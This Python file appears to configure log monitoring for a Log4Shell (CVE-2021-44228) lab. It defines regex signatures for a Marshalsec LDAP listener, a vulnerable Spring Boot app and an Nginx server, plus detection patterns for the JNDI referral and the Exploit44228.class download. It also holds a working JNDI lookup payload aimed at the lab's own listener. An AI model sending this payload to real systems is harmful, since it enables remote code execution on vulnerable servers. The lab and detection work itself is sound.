import logging
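# Log signatures and status messages for a CVE-2021-44228 (Log4Shell) lab made
# of a Marshalsec LDAP listener, a vulnerable Spring Boot app and an Nginx
# server. How these constants are consumed is not visible in this file;
# presumably a log watcher matches each pattern against container output
# line by line -- confirm against the caller.

# Log level names as plain strings.
DEBUG = "DEBUG"
INFO = "INFO"
WARNING = "WARNING"
ERROR = "ERROR"

# --- Service start-up signatures -------------------------------------------
# Literal dots are escaped so "0.0.0.0" matches only that address text rather
# than any seven characters of the same shape.
MARSHAL_SEC_UP_PATTERN = r"^.*Listening on 0\.0\.0\.0:1389.*$"
MARSHAL_SEC_UP_MESSAGE = "Marshalsec is up and running"

SPRING_BOOT_UP_PATTERN = r"^.*:: Spring Boot ::.*$"
SPRING_BOOT_UP_MESSAGE = "Vulnerable spring boot is up and running "

PAYLOAD_SENT_PATTERN = r".*Sending payload.*"
PAYLOAD_SENT_MESSAGE = "The payload was sent using curl"

HTTP_SERVER_UP_PATTERN = r".*1#1: nginx/.*"
HTTP_SERVER_UP_MESSAGE = "Nginx server is up and running"

# --- Exploitation indicators -----------------------------------------------
# These two signatures are the observable evidence that the JNDI lookup was
# honoured: first the LDAP referral served by Marshalsec, then the HTTP fetch
# of the referenced class file. The same two-step sequence (unexpected
# outbound LDAP followed by a remote .class download) is what a defender
# would look for in network and proxy logs.
MARSHAL_SEC_CALLED_FOR_44228_PATTERN = (
    r".*Send LDAP reference result for Exploit44228 redirecting to.*"
)
MARSHAL_SEC_CALLED_FOR_44228_MESSAGE = (
    "The LDAP call was made by the JNDI payload due to CVE-2021-44228"
    " (Possible exfiltration)"
)

# The dot before "class" is escaped so only the real file name matches.
HTTP_CALLED_FOR_44228_PATTERN = r".*GET /Exploit44228\.class HTTP/1.*"
HTTP_CALLED_FOR_44228_MESSAGE = (
    "Exploit is being downloaded from the Nginx server due to CVE-2021-44228"
)

# Lookup string used by the lab. It targets host.docker.internal:1389, the
# same port as the Marshalsec start-up signature above, i.e. the lab's own
# listener on the Docker host.
DEFAULT_PAYLOAD = "${jndi:ldap://host.docker.internal:1389/Exploit44228}"

# Each row is [regex pattern, human-readable message, logging level].
# Start-up and "payload sent" events are INFO; the two exploitation
# indicators are WARNING.
LOG_PATTERNS = [
    [MARSHAL_SEC_UP_PATTERN, MARSHAL_SEC_UP_MESSAGE, logging.INFO],
    [SPRING_BOOT_UP_PATTERN, SPRING_BOOT_UP_MESSAGE, logging.INFO],
    [PAYLOAD_SENT_PATTERN, PAYLOAD_SENT_MESSAGE, logging.INFO],
    [HTTP_CALLED_FOR_44228_PATTERN, HTTP_CALLED_FOR_44228_MESSAGE, logging.WARNING],
    [
        MARSHAL_SEC_CALLED_FOR_44228_PATTERN,
        MARSHAL_SEC_CALLED_FOR_44228_MESSAGE,
        logging.WARNING,
    ],
]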